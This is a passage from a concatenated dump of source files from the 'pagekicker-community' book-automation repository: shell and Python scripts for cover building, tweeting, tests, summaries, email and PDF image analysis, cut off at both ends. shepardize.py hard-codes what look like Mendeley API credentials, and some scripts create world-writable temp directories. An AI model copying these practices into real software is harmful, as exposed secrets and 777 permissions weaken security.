\"$newcoverfont\" \\\n#\t\t images/$uuid/bottomcanvas.png +swap -gravity south -composite images/$uuid/canvas.png\n\n#\t# lay the labels on top of the target canvas\n\n#\tcomposite -gravity south +0+0 assets/PK.png images/$uuid/canvas.png images/$uuid/$sku\".png\"\n\n;;\n\n*)\n\techo \"invalid cover type id was \" $covertype_id | tee --append $xform_log\n\texit 1;;\n\nesac\n\n" }, { "alpha_fraction": 0.6529157757759094, "alphanum_fraction": 0.6548596024513245, "avg_line_length": 29.873332977294922, "blob_id": "8d6535ba085c6f2c67b34ba64c507bbba216f666", "content_id": "47aa4b734be99db52c90bea5a8d3a156680e0c12", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4630, "license_type": "permissive", "max_line_length": 95, "num_lines": 150, "path": "/scripts/bin/twitter-test.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python\n\n\n'''Post a message to twitter'''\n\n__author__ = '[email protected]'\n\n\ntry:\n import configparser\nexcept ImportError as _:\n import configparser as configparser\n\nimport getopt\nimport os\nimport sys\nimport twitter\nimport argparse\n\n\n\nUSAGE = '''Usage: tweet [options] message\n This script posts a message to Twitter.\n Options:\n -h --help : print this help\n --consumer-key : the twitter consumer key\n --consumer-secret : the twitter consumer secret\n --access-key : the twitter access token key\n --access-secret : the twitter access token secret\n --encoding : the character set encoding used in input strings, e.g. \"utf-8\". [optional]\n --message : file containing text message up to 280 characters\n --image: attached image\n Documentation:\n If either of the command line flags are not present, the environment\n variables TWEETUSERNAME and TWEETPASSWORD will then be checked for your\n consumer_key or consumer_secret, respectively.\n If neither the command line flags nor the environment variables are\n present, the .tweetrc file, if it exists, can be used to set the\n default consumer_key and consumer_secret. The file should contain the\n following three lines, replacing *consumer_key* with your consumer key, and\n *consumer_secret* with your consumer secret:\n A skeletal .tweetrc file:\n [Tweet]\n consumer_key: *consumer_key*\n consumer_secret: *consumer_password*\n access_key: *access_key*\n access_secret: *access_password*\n'''\n\n\ndef PrintUsageAndExit():\n print(USAGE)\n sys.exit(2)\n\n\ndef GetConsumerKeyEnv():\n return os.environ.get(\"TWEETUSERNAME\", None)\n\n\ndef GetConsumerSecretEnv():\n return os.environ.get(\"TWEETPASSWORD\", None)\n\n\ndef GetAccessKeyEnv():\n return os.environ.get(\"TWEETACCESSKEY\", None)\n\n\ndef GetAccessSecretEnv():\n return os.environ.get(\"TWEETACCESSSECRET\", None)\n\n\nclass TweetRc(object):\n def __init__(self):\n self._config = None\n\n def GetConsumerKey(self):\n return self._GetOption('consumer_key')\n\n def GetConsumerSecret(self):\n return self._GetOption('consumer_secret')\n\n def GetAccessKey(self):\n return self._GetOption('access_key')\n\n def GetAccessSecret(self):\n return self._GetOption('access_secret')\n\n def _GetOption(self, option):\n try:\n return self._GetConfig().get('Tweet', option)\n except:\n return None\n\n def _GetConfig(self):\n if not self._config:\n self._config = configparser.ConfigParser()\n self._config.read(os.path.expanduser('~/.tweetrc'))\n return self._config\n\n\ndef main():\n try:\n shortflags = 'h'\n longflags = ['help', 'consumer-key=', 'consumer-secret=',\n 'access-key=', 'access-secret=', 'encoding=']\n opts, args = getopt.gnu_getopt(sys.argv[1:], shortflags, longflags)\n except getopt.GetoptError:\n PrintUsageAndExit()\n consumer_keyflag = None\n consumer_secretflag = None\n access_keyflag = None\n access_secretflag = None\n encoding = None\n for o, a in opts:\n if o in (\"-h\", \"--help\"):\n PrintUsageAndExit()\n if o in (\"--consumer-key\"):\n consumer_keyflag = a\n if o in (\"--consumer-secret\"):\n consumer_secretflag = a\n if o in (\"--access-key\"):\n access_keyflag = a\n if o in (\"--access-secret\"):\n access_secretflag = a\n if o in (\"--encoding\"):\n encoding = a\n message = ' '.join(args)\n if not message:\n PrintUsageAndExit()\n rc = TweetRc()\n consumer_key = consumer_keyflag or GetConsumerKeyEnv() or rc.GetConsumerKey()\n consumer_secret = consumer_secretflag or GetConsumerSecretEnv() or rc.GetConsumerSecret()\n access_key = access_keyflag or GetAccessKeyEnv() or rc.GetAccessKey()\n access_secret = access_secretflag or GetAccessSecretEnv() or rc.GetAccessSecret()\n if not consumer_key or not consumer_secret or not access_key or not access_secret:\n PrintUsageAndExit()\n api = twitter.Api(consumer_key=consumer_key, consumer_secret=consumer_secret,\n access_token_key=access_key, access_token_secret=access_secret,\n input_encoding=encoding)\n try:\n status = api.PostUpdate(message)\n except UnicodeDecodeError:\n print(\"Your message could not be encoded. Perhaps it contains non-ASCII characters? \")\n print(\"Try explicitly specifying the encoding with the --encoding flag\")\n sys.exit(2)\n\n print(\"{0} just posted: {1}\".format(status.user.name, status.text))\n\nif __name__ == \"__main__\":\n main()" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6751739978790283, "avg_line_length": 28.363636016845703, "blob_id": "d445341c634d2b5c1791ff76c2e3e85ce4c5fd03", "content_id": "3ca9adb4cf2f7291c1bcaed8b6cc779e80d471a5", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1293, "license_type": "permissive", "max_line_length": 259, "num_lines": 44, "path": "/test/import.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash \n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n\n. includes/set-variables.sh\n\nif [ ! \"$passuuid\" ] ; then\n\t#echo \"creating uuid\"\n\tuuid=$(\"$PYTHON_BIN\" -c 'import uuid; print uuid.uuid1()')\n\t#echo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 777 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 777 $TMPDIR$uuid\nfi\n\n\nbin/create-catalog-entry.sh --builder \"yes\" --booktitle \"Paella\" --yourname \"Manuel\" --jobprofilename \"default\" --import \"yes\" --passuuid \"$uuid\" --seedfile \"seeds/paella\" --imprint \"pagekicker\" --analyze_url \"none\" --summary \"summaries_only\" --pricing \"yes\"\n\n# tests begin here\n\nif [ ! -f \"$TMPDIR$uuid/ebookcover.jpg\" ]; then\n echo \"error: cover not found! \" > \"$TMPDIR$uuid/test.log\"\nfi\n\nif [ ! -f $metadatatargetpath$uuid\"/current-import.csv\" ] ; then\n\techo \"error: no import file found\" >> \"$TMPDIR$uuid/test.log\"\nelse\n\techo \"import file found, price was $price\"\nfi\n\n# if error log is empty then PASS\n\necho \"PASS\" \" $uuid\" | tee -a $LOCAL_DATA/logs/error.log\n\n" }, { "alpha_fraction": 0.7683615684509277, "alphanum_fraction": 0.790960431098938, "avg_line_length": 58, "blob_id": "53dc83ff25fd1a4b767cb7f9ef8a90e7e3397a7d", "content_id": "29b88c97e60175332f3d3024f08eba904a17ed3d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 177, "license_type": "permissive", "max_line_length": 150, "num_lines": 3, "path": "/conf/jobprofiles/imprints/pagekicker/pagekicker_mission.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# About PageKicker Press\n\nPageKicker is the world's leading publisher of algorithmically created books. It was founded by Fred Zimmerman in Ann Arbor, Michigan, USA in September 2012.\n" }, { "alpha_fraction": 0.6028985381126404, "alphanum_fraction": 0.616425096988678, "avg_line_length": 37.33333206176758, "blob_id": "b276256314542e0c4b80ec95cf0bae3d70d5c227", "content_id": "97d9afc535b7e9916d22cb359f8bd1c2cceae77b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 1035, "license_type": "permissive", "max_line_length": 81, "num_lines": 27, "path": "/scripts/includes/tldr_auto.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "# returns tldr.txt & tldr.md\nif [ -z \"$tldr\" ] ; then\n\techo \"no tldr supplied, generate automatically\"\n\techo \"TL;DR: \"\"$tldr\" > $TMPDIR$uuid/tldr.txt\n echo \" \" > $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n echo \"# TL;DR: \"\"$tldr\" >> $TMPDIR$uuid/tldr.md\n\tsed -n 1p $TMPDIR$uuid/pp_summary_all.txt | cut -c 1-72 >> $TMPDIR$uuid/tldr.txt\n sed -n 1p $TMPDIR$uuid/pp_summary_all.txt | cut -c 1-72 >> $TMPDIR$uuid/tldr.md\n\t# 60 was not enough, 80 would be a full line, 72 is conventional\n\techo \"automatically generated tldr is $TMPDIR$uuid/tldr.txt\"\n echo \"...\" >> $TMPDIR$uuid/tldr.txt\n echo \"...\" >> $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n\nelse\n\techo \"TL;DR: \"\"$tldr\" > $TMPDIR$uuid/tldr.txt\n echo \" \" > $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n echo \"# TL;DR: \"\"$tldr\" >> $TMPDIR$uuid/tldr.md\n echo \"...\" >> $TMPDIR$uuid/tldr.txt\n echo \"...\" >> $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n echo \" \" >> $TMPDIR$uuid/tldr.md\n\nfi\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.728205144405365, "avg_line_length": 40.78571319580078, "blob_id": "92f87f7fca9229499d5c9f4cae1f433b8c8a14be", "content_id": "ff3c6181f38a2c610b29c7c8d22eb5438c548625", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 585, "license_type": "permissive", "max_line_length": 94, "num_lines": 14, "path": "/scripts/bin/covertemplate.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\neditedby=\"Vincent P. O'Hara\"\ncovertitle=\"The Royal Navy's Revenge and Other Little-Known Encounters of the War at Sea\" \n./bin/standalone-print.sh \\\n--ISBN \"9781608881130\" \\\n--shorttitle \"Encounters of the War at Sea\" \\\n--imprintname \"Nimble Books LLC\" \\\n--spineinches \"0.313\" \\\n--pdfpath \"/home/fred/share/978-1-60888-113-0_txt_OHARA_v15.pdf\" \\\n--userimage \"/home/fred/Downloads/Dhonburi_kohchang.tif\" \\\n--usercaption \"The Thai ship Dhonburi under French fire at the battle of Koh Chang in 1941.\" \\\n--editedby \"$editedby\" \\\n--covertitle \"$covertitle\" \\\n--covertype \"imagefrontcenter\"\n" }, { "alpha_fraction": 0.6281055808067322, "alphanum_fraction": 0.64402174949646, "avg_line_length": 13.959301948547363, "blob_id": "689c6e951fe1ee3590129aa3fd013303194b9cf0", "content_id": "4ce51d637b0f84b755f39a6948f1c5bc1b84a33d", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 2576, "license_type": "permissive", "max_line_length": 97, "num_lines": 172, "path": "/scripts/louella.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# manages publicity for a book or robot\n\nstarttime=$(( `date +%s` ))\n\n# parse the command-line very stupidly\n\n\n. includes/set-variables\n\nif [ \"$environment\" = \"Production\" ] ; then\n\n . /opt/bitnami/apache2/htdocs/pk-production/production/conf/config.txt\n echo \"running prod config\" > ~/which_xform\n\nelse\n\n . /opt/bitnami/apache2/htdocs/pk-new/development/conf/config.txt\n echo \"running dev config\" > ~/which_xform\n\nfi\n\necho \"software id in\" \"$environment\" \"is\" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\nexport PATH=$PATH:/opt/bitnami/java/bin\n\necho \"PATH is\" $PATH\n# default values\n\nfb_on=\"no\"\n\n# command line processing \n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires user to provide path to directory containing one or more txt files\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--shorttitle)\nshorttitle=$2\nshift 2\n;;\n--shorttitle=*)\nshorttitle=${1#*=}\nshift\n;;\n--shortname)\nshortname=$2\nshift 2\n;;\n--shortname=*)\nshortname=${1#*=}\nshift\n;;\n--shorturl)\nshorturl=$2\nshift 2\n;;\n--shorturl=*)\nshorturl=${1#*=}\nshift\n;;\n--interval)\ninterval=$2\nshift 2\n;;\n--interval=*)\ninterval=${1#*=}\nshift \n;;\n--shortmsg)\nshortmsg=$2\nshift 2\n;;\n--shortmsg=*)\nshortmsg=${1#*=}\nshift\n;;\n--shortmsg_after)\nshortmsg_after=$2\nshift 2\n;;\n--shortmsg_after=*)\nshortmsg_after=${1#*=}\nshift\n;;\n--longmsg)\nlongmsg=$2\nshift 2\n;;\n--longmsg=*)\nlongmsg=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--fb_on)\nfb_on=$2\nshift 2\n;;\n--fb_on=*)\nfb_on=${1#*=}\nshift\n;;\n --) # End of all options\n\t shift\n\t break\n\t ;;\n\t-*)\n\t echo \"WARN: Unknown option (ignored): $1\" >&2\n\t shift\n\t ;;\n\t*) # no more options. Stop while loop\n\t break\n\t ;;\n\nesac\ndone\n\n# Suppose some options are required. Check that we got them.\n\n#if [ ! \"$shorturl\" ]; then\n# echo \"ERROR: option '--shorturl' not given. See --help\" >&2\n# exit 1\n#fi\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuid1()')\n\techo \"uuid is\" $uuid | tee --append $xform_log\n\tmkdir -p -m 755 tmp/$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\nfi\n\n# file processing begins\n\n# while csv file\n\n\n\nt update \"$shortmsg $shortname $shorttitle $shorturl $robot_credit $shortmsg_after $longmsg\"\n\nif [ \"$fb_on\" = \"yes\" ] ; then\n\n\tfbcmd status \"$longmsg $shortmsg $shortname $shorttitle $shorturl $robot_credit $shortmsg_after\"\n\nelse\n\techo \"no fb post\"\n\nfi\n\n# mailchimp?\n\n\n# done<../conf/publicity_bots/watch_files/watch_titles.csv\nexit\n0\n\n\n\n" }, { "alpha_fraction": 0.7177335023880005, "alphanum_fraction": 0.746065080165863, "avg_line_length": 21.13953399658203, "blob_id": "846ab70ebf173dc692f50468052d3da0c85cc04a", "content_id": "843e1df06603dec20926a6b29fd19da577c7e83b", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 953, "license_type": "permissive", "max_line_length": 84, "num_lines": 43, "path": "/scripts_python_3/bin/shepardize.py", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "\n# Mendeley API \"Shepardize for Scientists\"\n\n# check for updated citations to articles cited in bibliography\n\n# task flow\n\n\t# authenticate to Mendeley\n\n\t# select group\n\n\t# select \"update since\" date\n\n\t# for i = 1 to (documents in group)\n\n\t\t# search for n documents related to i and date gt update since\n\n\t\t# if n > 0 increment docsupdated counter by 1 and increment totaldocstoreview by n\n\n\t\t# save documents 1...n in group (subgroup for review)\n\n\t\t# save document titles 1...n to file\n\n\t# report\n\n\t\t#checked n documents from group name\n\n\t\t# there were new citations related to docsupdated\n\n\t\t# totalsdocs to review have been added to group(for review)\n\n\nfrom pprint import pprint\nfrom mendeley_client import MendeleyClient\nmendeley = MendeleyClient('13a47f20711f5d5ffe8e8f4db1df1daa04f8bd9b6', '394d64a2907f23c7f6ea5d94fb386865')\ntry:\n mendeley.load_keys()\nexcept IOError:\n\tmendeley.get_required_keys()\n\tmendeley.save_keys()\n\n\nfolders = mendeley.group_folders(groupId)\npprint(folders)\n" }, { "alpha_fraction": 0.6370370388031006, "alphanum_fraction": 0.7481481432914734, "avg_line_length": 14, "blob_id": "b8fe1009da34e099dc1aeca9d74c80822e45273e", "content_id": "1633889f87c349ed6104371c33348223ded41e83", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 136, "license_type": "permissive", "max_line_length": 55, "num_lines": 9, "path": "/conf/jobprofiles/imprints/wapacklabs/wapacklabscopyrightpage.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Wapack Labs\n\[email protected]\n\n326 Chestnut Hill Road, Suite 400\n\nNew Boston, NH 03070\n\nCopyright © 2016 Wapack Labs, Inc. All rights reserved\n" }, { "alpha_fraction": 0.7096773982048035, "alphanum_fraction": 0.8387096524238586, "avg_line_length": 30, "blob_id": "08b0f661bda0fc48c59d9b7f90fbd469e1651089", "content_id": "82c23afe46d220e06a6bc99ab047727206e28997", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 31, "license_type": "permissive", "max_line_length": 30, "num_lines": 1, "path": "/conf/jobprofiles/authorbios/HG572.md", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "Military History 1870 to today\n" }, { "alpha_fraction": 0.6415525078773499, "alphanum_fraction": 0.6506849527359009, "avg_line_length": 21.461538314819336, "blob_id": "11e94917425e30dd2601f61b273c2f7946c791ba", "content_id": "f962e395c495f66419c06075bd19fc4f74a8d4c8", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 876, "license_type": "permissive", "max_line_length": 93, "num_lines": 39, "path": "/test/sendemail-tester.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# tests whether sendemail is working on this system\n# assumes existence of .pagekicker/config.txt file\n\nif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\techo \"exiting\"\n\texit 1\nelse\n\t. \"$HOME\"/.pagekicker/config.txt\n\techo \"read config file from $HOME\"\"/.pagekicker/config.txt\"\nfi\n\n\necho \"software version number is\" $SFB_VERSION\n\n\necho \"completed reading config file and beginning logging at\" `date +'%m/%d/%y%n %H:%M:%S'` \n\nstarttime=$(( `date +%s` ))\n\n\n. includes/set-variables.sh\n\nsendemail -t \"[email protected]\" \\\n\t\t-u \"test email\" \\\n\t\t-f \"$GMAIL_ID\" \\\n\t\t-cc \"$GMAIL_ID\" \\\n\t\t-xu \"$GMAIL_ID\" \\\n\t\t-xp \"$GMAIL_PASSWORD\" \\\n\t\t-s smtp.gmail.com:587 \\\n\t\t-o tls=yes \\\n\t\t-a ../test/tmpbody.md \\\n\t\t-o message-file=\"../test/emailbody\" \\\n\t\t-vv\n\t\nexit 0\n" }, { "alpha_fraction": 0.7016411423683167, "alphanum_fraction": 0.712841272354126, "avg_line_length": 32.00898742675781, "blob_id": "b4b62f4f2821e2a20b30269a1dc272d497341b57", "content_id": "d9abdd6cc40e31dced0f2ec6e4fdfda18551c1cf", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 25714, "license_type": "permissive", "max_line_length": 341, "num_lines": 779, "path": "/scripts/dat.sh", "repo_name": "fredzannarbor/pagekicker-community", "src_encoding": "UTF-8", "text": "#!/bin/bash\n\n# stand-alone version of xform.sh routine that\n# extracts, analyzes, and summarizes images from permissioned PDF documents\n\n# requires pdfimages, imagemagick, fdupes\n\n\n# input: PDF file OR url\n# output: unique jpgs, zip, montage\n\n#defaults before command line\n\nif shopt -q login_shell ; then\n\n\tif [ ! -f \"$HOME\"/.pagekicker/config.txt ]; then\n\t\techo \"config file not found, creating /home/<user>/.pagekicker, put config file there\"\n\t\tmkdir -p -m 755 \"$HOME\"/.pagekicker\n\t\techo \"exiting\"\n\t\texit 1\n\telse\n\t\t. \"$HOME\"/.pagekicker/config.txt\n\t\techo \"read config file from login shell $HOME\"\"/.pagekicker/config.txt\"\n\tfi\nelse\n\t. /home/$(whoami)/.pagekicker/config.txt #hard-coding /home is a hack\n\techo \"read config file from nonlogin shell /home/$(whoami)/.pagekicker/config.txt\"\nfi\n\ncd $scriptpath\n\n. includes/set-variables.sh\n\necho \"software id in\" \"$environment\" \"is\" $SFB_VERSION\n\ncd $scriptpath\necho \"scriptpath is\" $scriptpath\n\n\nsource ~/.bashrc\nstarttime=$(( `date +%s` ))\n\nxformlog=\"$logdir$uuid\"/xform_log\n\necho \"-D-D-D-D-D-D-D-D\" | tee --append $sfb_logdat\necho \"starting Document Analysis Tools Stand-alone\"\n\n\n# default values\ndat=\"yes\"\n\n# checking parameter passing\n\necho \"parameter 1 is \" $1\necho \"parameter 2 is\" $2\necho \"parameter 3 is\" $3\necho \"parameter 4 \"is $4\n\n\nwhile :\ndo\ncase $1 in\n--help | -\\?)\necho \"requires PDF filename; example: dat.sh filename\"\nexit 0 # This is not an error, the user requested help, so do not exit status 1.\n;;\n--pdfinfile)\npdfinfile=$2\nshift 2\n;;\n--pdfinfile=*)\npdfinfile=${1#*=}\nshift\n;;\n--stopimagefolder)\nstopimagefolder=$2\nshift 2\n;;\n--stopimagefolder=*)\nstopimagefolder=${1#*=}\nshift\n;;\n--maximages)\nmaximages=$2\nshift 2\n;;\n--maximages=*)\nmaximages=${1#*=}\nshift\n;;\n--outfile)\noutfile=$2\nshift 2\n;;\n--outfile=*)\noutfile=${1#*=}\nshift\n;;\n--environment)\nenvironment=$2\nshift 2\n;;\n--environment=*)\nenvironment=${1#*=}\nshift\n;;\n--montageurdir)\nmontageurdir=$2\nshift 2\n;;\n--montageurdir=*)\nmontageurdir=${1#*=}\nshift\n;;\n--passuuid)\npassuuid=$2\nshift 2\n;;\n--passuuid=*)\npassuuid=${1#*=}\nshift\n;;\n--url)\nurl=$2\nshift 2\n;;\n--url=*)\nurl=${1#*=}\nshift\n;;\n--xmldirectoryname)\nxmldirectoryname=$2\nshift 2\n;;\n--xmldirectoryname=*)\nxmldirectoryname=${1#*=}\nshift\n;;\n--xmlbasefile)\nxmlbasefile=$2\nshift 2\n;;\n--xmlbasefile=*)\nxmlbasefile=${1#*=}\nshift\n;;\n--flickr)\nflickr=$2\nshift 2\n;;\n--flickr=*)\nflickr=${1#*=}\nshift\n;;\n--frontmatter)\nfrontmatter=$2\nshift 2\n;;\n--frontmatter=*)\nfrontmatter=${1#*=}\nshift\n;;\n--backmatter)\nbackmatter=$2\nshift 2\n;;\n--backmatter=*)\nbackmatter=${1#*=}\nshift\n;;\n--cli)\ncli=$2\nshift 2\n;;\n--cli=*)\ncli=${1#*=}\nshift\n;;\n--buildtarget)\nbuildtarget=$2\nshift 2\n;;\n--buildtarget=*)\nbuildtarget=${1#*=}\nshift\n;;\n--import)\nimport=$2\nshift 2\n;;\n--import=*)\nimport={1#*=}\nshift\n;;\n --) # End of all options\n shift\n break\n ;;\n -*)\n echo \"WARN: Unknown option (ignored): $1\" >&2\n shift\n ;;\n *) # no more options. Stop while loop\n break\n ;;\n\nesac\ndone\n\n\n# Suppose some options are required. Check that we got them.\n\nif [ ! \"$passuuid\" ] ; then\n\techo \"creating uuid\"\n\tuuid=$(python -c 'import uuid; print uuid.uuiddat-1()')\n\techo \"uuid is\" $uuid | tee --append $sfb_log\n\tmkdir -p -m 755 $TMPDIR$uuid\nelse\n\tuuid=$passuuid\n\techo \"received uuid \" $uuid\n\tmkdir -p -m 755 $TMPDIR$uuid\nfi\n\nmkdir -p -m 755 $TMPDIR$uuid/decrypted\n\n#$export PATH=$PATH:/opt/bitnami/java/bin\n\n#echo \"PATH is\" $PATH\n\necho \"xmldirectoryname is\" $xmldirectoryname\necho \"xmlbasename is \"$xmlbasefile\n\nif [ \"$xmldirectoryname\" ] ; then\n\txmlfilename=$xmldirectoryname/$xmlbasefile\n\nelse\n\n\techo \"no xml file specified, so using default.xml file and looking for url\"\n\txmlfilename=\"bin/dat/xml/default.xml\"\nfi\n\nsubmissionid=$(xmlstarlet sel -t -v \"/item/id\" \"$xmlfilename\")\nenvironment=$(xmlstarlet sel -t -v \"/item/environment\" \"$xmlfilename\")\necho \"environment is\" $environment\ncustomer_email=$(xmlstarlet sel -t -v \"/item/customer_email\" \"$xmlfilename\")\njobprofilename=$(xmlstarlet sel -t -v \"/item/jobprofilename\" \"$xmlfilename\")\necho \"jobprofilename is\" $jobprofilename\ncustomtitle=$(xmlstarlet sel -t -v \"/item/customtitle\" \"$xmlfilename\")\nbyline=$(xmlstarlet sel -t -v \"/item/byline\" \"$xmlfilename\")\nimprint=$(xmlstarlet sel -t -v \"/item/imprint\" \"$xmlfilename\")\nLANG=$(xmlstarlet sel -t -v \"/item/lang\" \"$xmlfilename\")\nuploaded_tat_file=$(xmlstarlet sel -t -v \"/item/uploaded_tat_file\" \"$xmlfilename\")\nwordcloud_width=$(xmlstarlet sel -t -v \"/item/wordcloud_width\" \"$xmlfilename\")\nwordcloud_height=$(xmlstarlet sel -t -v \"/item/wordcloud_height\" \"$xmlfilename\")\nwordcloud_submit=$(xmlstarlet sel -t -v \"/item/wordcloudat-d_submit\" \"$xmlfilename\")\necho \"uploaded_tat_file is\" $uploaded_tat_file | tee --append $sfb_log\ngetwiki=$(xmlstarlet sel -t -v \"/item/getwiki\" \"$xmlfilename\")\n# echo \"wordcloud_width\"=$wordcloud_width \"and height =\" $wordcloud_height\n# summarizer flags\n\n\nsummarizer_on=$(xmlstarlet sel -t -v \"/item/summarizer\" \"$xmlfilename\")\nsummary_length=$(xmlstarlet sel -t -v \"/item/summary_length\" \"$xmlfilename\")\npositive_seeds=$(xmlstarlet sel -t -v \"/item/positive_seeds\" \"$xmlfilename\")\npositive_seed_weight=$(xmlstarlet sel -t -v \"/item/positive_seed_weight\" \"$xmlfilename\")\nnegative_seeds=$(xmlstarlet sel -t -v \"/item/negative_seeds\" \"$xmlfilename\")\nnegative_seed_weight=$(xmlstarlet sel -t -v \"/item/negative_seed_weight\" \"$xmlfilename\")\nsummarizer_ngram_threshold=$(xmlstarlet sel -t -v \"/item/summarizer_ngram_threshold\" \"$xmlfilename\")\ndecimator_requested=$(xmlstarlet sel -t -v \"/item/decimator_requested\" \"$xmlfilename\")\ntldr=$(xmlstarlet sel -t -v \"/item/tldr\" \"$xmlfilename\")\nurl=$(xmlstarlet sel -t -v \"/item/url\" \"$xmlfilename\")\necho \"summarizer on is\" $summarizer_on | tee --append $sfb_log\necho \"summary length is\" $summary_length | tee --append $sfb_log\necho \"positive_seeds were\" $positive_seeds| tee --append $sfb_log\necho \"positive_seed_weight was\" $positive_seed_weight| tee --append $sfb_log\necho \"negative_seeds were\" $negative_seeds| tee --append $sfb_log\necho \"negative_seed_weight was \"$negative_seed_weight| tee --append $sfb_log\necho \"summarizer_ngram_threshold was\" $summarizer_ngram_threshold| tee --append $sfb_log\necho \"url to fetch is\" $url | tee --append $sfb_log\necho \"decimator_requested is \" $decimator_requested\nimagekeyword=$(xmlstarlet sel -t -v \"/item/imagekeyword\" \"$xmlfilename\")\n\n. \"$confdir\"jobprofiles/robots/\"$jobprofilename\"\".jobprofile\"\n. \"$confdir\"jobprofiles/imprints/$imprint/$imprint\".imprint\"\necho \"jobprofile is $jobprofile\"\necho \"imprint is $imprint\"\necho \"WEBFORMSXML_HOME is $WEBFORMSXML_HOME\"\n\nexport LANG\n\nif [ -n \"$url\" ] ; then\n\techo \"downloading file\" $url \" from Internet\" | tee --append $sfb_log\n\twget --tries=45 \"$url\" -O $TMPDIR$uuid/downloaded_wget_file.pdf\n\nelse\n\n\techo \"uploaded file\" $uploaded_tat_file \"from user's computer\" | tee --append $sfb_log\n\nfi\necho \"checking $decimator_requested\"\n\nif [ \"$decimator_requested\" = \"Decimator only\" ] ; then\n\tupload_tat_field_code=\"521\" # hard bound to PK magento production installation - fix\n echo $upload_tat_field_code\nelif [ \"$decimator_requested\" = \"Include Decimator\" ] ; then\n\tupload_tat_field_code=\"300\"\nelse\n\tupload_tat_field_code=\"300\"\nfi\n\na=$submissionid\nsubmissionid_base=\"${a%.*}\"\necho \"submissionid_base is\" $submissionid_base\necho \"uploaded_tat_file is \"$uploaded_tat_file\n\n\nif [ -z \"$url\" ] ; then\n\techo \"WEBFORMSHOME is\" $WEBFORMSHOME\n\n\tcp $WEBFORMSHOME$submissionid_base/$upload_tat_field_code/*/$uploaded_tat_file $TMPDIR$uuid/$uploaded_tat_file\n\tcp $WEBFORMSHOME$submissionid_base/$upload_tat_field_code/*/$uploaded_tat_file $scriptpath/scr/debug\n\nelse\n\n\techo \"renaming uploaded_tat to downloaded_wget\"\n\tuploaded_tat_file=\"downloaded_wget_file.pdf\"\n\nfi\n\n\n\nif [ \"$decimator_requested\" = \"Decimator only\" ] ; then\n\techo \"running Decimator only\"\n\tmkdir -p -m 755 $TMPDIR$uuid/decimator\n\tbin/decimator.sh --pdfinfile \"$TMPDIR$uuid/$uploaded_tat_file\" --outdir \"$TMPDIR$uuid/decimator\" --passuuid \"$uuid\" --tldr \"$tldr\"\n\tsendemail -t \"$customer_email\" \\\n\t-u \"Decimator Result\" \\\n\t-m \"PageKicker's Document Analysis Robots living on \"$MACHINE_NAME \"and using version \" $SFB_VERSION \" of the PageKicker software have analyzed your file \" $uploaded_tat_file \" in job\" $uuid \\\n \". The Decimator slide deck is attached here.\" \\\n\t-f \"$GMAIL_ID\" \\\n\t-cc \"$GMAIL_ID\" \\\n\t-xu \"$GMAIL_ID\" \\\n\t-xp 